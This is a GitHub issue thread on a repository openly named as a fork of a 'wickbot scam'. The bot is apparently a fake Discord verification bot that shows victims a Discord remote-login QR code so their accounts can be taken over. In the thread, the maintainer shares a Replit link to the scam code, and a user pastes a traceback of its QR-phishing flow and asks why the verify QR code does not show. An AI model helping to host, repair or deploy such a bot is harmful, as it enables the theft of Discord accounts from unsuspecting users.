### ISSUE TITLE
Replit

### ISSUE THREAD

**Issue by kevincrafturu2** [TheBogler/fork-wickbot-scam#1]
Yo any link of this but in replit?

**Comment by TheBogler** [comment]
replit - yes.

**Comment by kevincrafturu2** [comment]
Ooh perfect, can you pass it here or smth? To fork from replit

**Comment by kevincrafturu2** [comment]
Pleaseee

**Comment by TheBogler** [comment]
i so sorry for so long
https://replit.com/@kirill0jarikow1/CoordinatedUnkemptWheel#main.py

**Comment by kevincrafturu2** [comment]
Thanks, but there is an error when i click verify this error in replit appears and it appears interaction failed in discord + in replit this Ignoring exception in view <View timeout=None children=1> for item <Button style=<ButtonStyle.primary: 1> url=None disabled=False label='Verify Me' emoji=None row=None>:
Traceback (most recent call last):
  File "/home/runner/Wickbotsca/venv/lib/python3.8/site-packages/nextcord/ui/view.py", line 390, in _scheduled_task
    await item.callback(interaction)
  File "main.py", line 379, in verification_callback
    await interaction.response.send_message(embed=embed_qr, ephemeral=True)
  File "/home/runner/Wickbotsca/venv/lib/python3.8/site-packages/nextcord/interactions.py", line 893, in send_message
    await adapter.create_interaction_response(
  File "/home/runner/Wickbotsca/venv/lib/python3.8/site-packages/nextcord/webhook/async_.py", line 204, in request
    raise NotFound(response, data)
nextcord.errors.NotFound: 404 Not Found (error code: 10062): Unknown interaction
Task exception was never retrieved
future: <Task finished name='Task-61' coro=<start.<locals>.verification_callback.<locals>.RemoteAuthClient.run() done, defined at main.py:149> exception=NotFound('404 Not Found (error code: 10015): Unknown Webhook')>
Traceback (most recent call last):
  File "main.py", line 179, in run
    await self.on_fingerprint(data=f"https://discordapp.com/ra/{p['fingerprint']}")
  File "main.py", line 223, in on_fingerprint
    await interaction.edit_original_message(embed=embed_qr)
  File "/home/runner/Wickbotsca/venv/lib/python3.8/site-packages/nextcord/interactions.py", line 461, in edit_original_message
    data = await adapter.edit_original_interaction_response(
  File "/home/runner/Wickbotsca/venv/lib/python3.8/site-packages/nextcord/webhook/async_.py", line 204, in request
    raise NotFound(response, data)
nextcord.errors.NotFound: 404 Not Found (error code: 10015): Unknown Webhook


**Comment by kevincrafturu2** [comment]
Now it works but it dont show the verify qr
